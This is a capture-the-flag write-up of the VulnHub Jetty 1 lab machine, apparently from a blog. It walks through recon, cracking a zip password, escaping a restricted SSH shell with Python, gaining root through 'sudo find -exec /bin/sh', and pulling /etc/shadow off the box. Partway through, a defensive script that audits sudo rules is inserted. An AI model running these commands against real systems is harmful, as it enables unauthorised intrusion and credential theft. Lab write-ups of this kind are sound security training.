It’s that time again when we challenge our skills in an effort to learn something new daily, and VulnHub has provided yet again. Jetty 1 by MrSquid gives us the opportunity to pay attention to details and use cool tools. Let’s jump in, but before we do so, please read the warning below.

Public Service Announcement

THIS IS ONLY FOR EDUCATIONAL PURPOSES. DO NOT INSTALL/RUN THIS VULNERABLE VM ON ANY PRODUCTION NETWORK!

WHAT WE NEED TO GET STARTED.

Reconnaissance

RECON, RECON, RECON… and MORE RECON. We will start with netdiscover and Nmap to see what is out there.

netdiscover -r IPADDR/CIDR

We identified the following web directories in the Nmap scan results. However, all were unreachable, so we scanned further.

A new port, 65507/tcp, was open and running an unknown service; let’s see if netcat (nc) can do a bit more recon.

OK SSH-2.0, we see you running. Now that we have all the open ports accounted for (i.e., 21 – FTP, 80 – HTTP and 65507 – SSH), we need to go back to FTP since it allows “anonymous” login.

Username & Password: anonymous
mget *.* to grab all the FILES

README.txt

Hi Henry, here you have your SSH’s password. As you can see the file is encrypted with the default company’s password. Please, once you have read this file, run the following command on your computer to close the FTP server on your side. IT IS VERY IMPORTANT!! CMD: service ftp stop.
Regards, Michael.

The RECON is real with this one. Now we need to figure out the DEFAULT COMPANY PASSWORD to unzip this file, which will give us the SSH creds. So exciting… After researching crackers for zip files, we found the fcrackzip tool, and it was glorious.

fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt sshpass.zip

Now that we have the DEFAULT COMPANY PASSWORD, it’s time to use it to open the sshpass.zip file.

We had a password but no username, so of course we tried the names gathered during the first wave of RECON. Here are the usernames we tried with no success: “henry, jetty, michael, mrsquid, squid”. This is where we messed up. After backtracking to the VulnHub Jetty 1 description and carefully reviewing the system information, we found the username. Lesson learned: make sure your RECON process is tight. We could have easily spent hours trying to figure this one out.

Jetty 1 Description

The company Aquarium Life S.L. has contacted you to perform a pentest against one of their machines. They suspect that one of their employees has been committing fraud selling fake tickets. They want you to break into his computer, escalate privileges and search for any evidence that proves this behavior.

Extra information:
The suspicious username is Squiddie.
He was in charge of the ticket selling for the Aquarium. Ethernet settings set to NAT with DHCP enabled. You should find the IP in your VLAN.

To leave no stone unturned, we continued with our RECON process even though we already had SSH credentials.

Grab a copy of the Jetty 1 web server’s “robots.txt” file with wget.

robots.txt

User-agent: *
Disallow: /dir/
Disallow: /passwords/
Disallow: /facebook_photos
Disallow: /admin/secret

We browsed to all the web directories/paths with no success. At this point, we brought out the DIRB tool to dig in further.

Exploitation

Now that we have good information about the system and credentials, it is time to try SSH access with the credentials discovered in the RECON phase.

ssh squiddie@jetty -p 65507

OH NO… Restricted shell on SSH. WHHYYYYYY?? Okay, we got this.

Breakout of Restricted Shell
https://d00mfist.gitbooks.io/ctf/content/escaping_restricted_shell.html

Restricted shell breakout attempts that FAILED

  • ssh squiddie@jetty -p 65507 -t "/bin/sh"
  • ssh squiddie@jetty -p 65507 -t "bash --noprofile"
  • more / less / man -> !/bin/sh

But wait, we have PYTHON… LET’S GET IT!!!

We started the Python interpreter first, then followed up with "import pty; pty.spawn('/bin/bash')" to get a proper bash shell.

Privilege Escalation (PrivESC)

Manual PrivESC progress with “sudo -l” and “whoami”

https://gtfobins.github.io/gtfobins/find/#sudo
sudo find . -exec /bin/sh \; -quit

We PAUSED here so as not to jump ahead of ourselves and potentially overlook critical POST-EXPLOITATION RECON.

Transferring LinPEAS to the Jetty 1 VM and running automated POST-EXPLOITATION tools.

python -m SimpleHTTPServer 8080
wget IPADDR:8080/linpeas.sh

Both the manual and automated POST-EXPLOITATION processes show that the path to PRIVESC is running the “find” binary via “sudo”.

sudo find . -exec /bin/sh \; -quit
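For the defender’s side of this finding, here is an added example (not from the original write-up or the box) that audits the output of "sudo -l" and flags rules that hand out a shell-spawning binary such as find, especially with NOPASSWD. The sample output, user and host names are constructed for illustration; the binary list is a small subset of the GTFOBins "sudo" entries.

```python
import re

# Binaries that can spawn an interactive shell when run via sudo
# (a small subset of the GTFOBins "sudo" list; extend as needed).
SHELL_SPAWNERS = {"find", "vim", "vi", "less", "more", "man", "awk",
                  "python", "python3", "perl", "bash", "sh"}

# Constructed sample of `sudo -l` output for illustration only.
SAMPLE_SUDO_L = """\
Matching Defaults entries for someuser on somehost:
    env_reset, mail_badpass, secure_path=/usr/sbin:/usr/bin:/sbin:/bin

User someuser may run the following commands on somehost:
    (ALL) NOPASSWD: /usr/bin/find
    (root) /usr/bin/apt-get update
    (ALL : ALL) ALL
"""

# A rule line looks like: "(runas) [TAG: ...] command [args]"
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmd>.+)$")


def audit_sudo_l(text):
    """Return a list of (rule, reason) findings for risky sudo rules."""
    findings = []
    in_rules = False
    for line in text.splitlines():
        # Rules start after the "User X may run the following commands" line.
        if line.startswith("User ") and "may run" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        rule = line.strip()
        cmd = m.group("cmd").strip()
        if cmd == "ALL":
            findings.append((rule, "unrestricted command list"))
            continue
        # Compare only the basename, so /usr/bin/find and find both match.
        binary = cmd.split()[0].rsplit("/", 1)[-1]
        if binary in SHELL_SPAWNERS:
            reason = f"{binary} can spawn a shell (see GTFOBins)"
            if "NOPASSWD" in m.group("tags"):
                reason += ", without a password"
            findings.append((rule, reason))
    return findings
```

Any hit should be fixed in sudoers by removing the rule or restricting it to a wrapper script with fixed arguments, since argument-level restrictions on find cannot stop -exec.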

It worked perfectly; we are now ROOT ROOT and WOOT WOOT. Now we need to do what we came here for… GRAB ALL THE FILES.

We will grab the files with Netcat; we know there are better ways to do this, but we wanted to show that Netcat’s functionality can be endless. So here goes…

Receiver

Sender

Following this process, we were able to GRAB the following files.

  • user.txt
  • root.txt
  • proof.txt
  • notes.txt
  • /etc/passwd
  • /etc/shadow

Another VulnHub box DONE; hopefully this helps. Thanks to VulnHub and MrSquid.

CyberGuider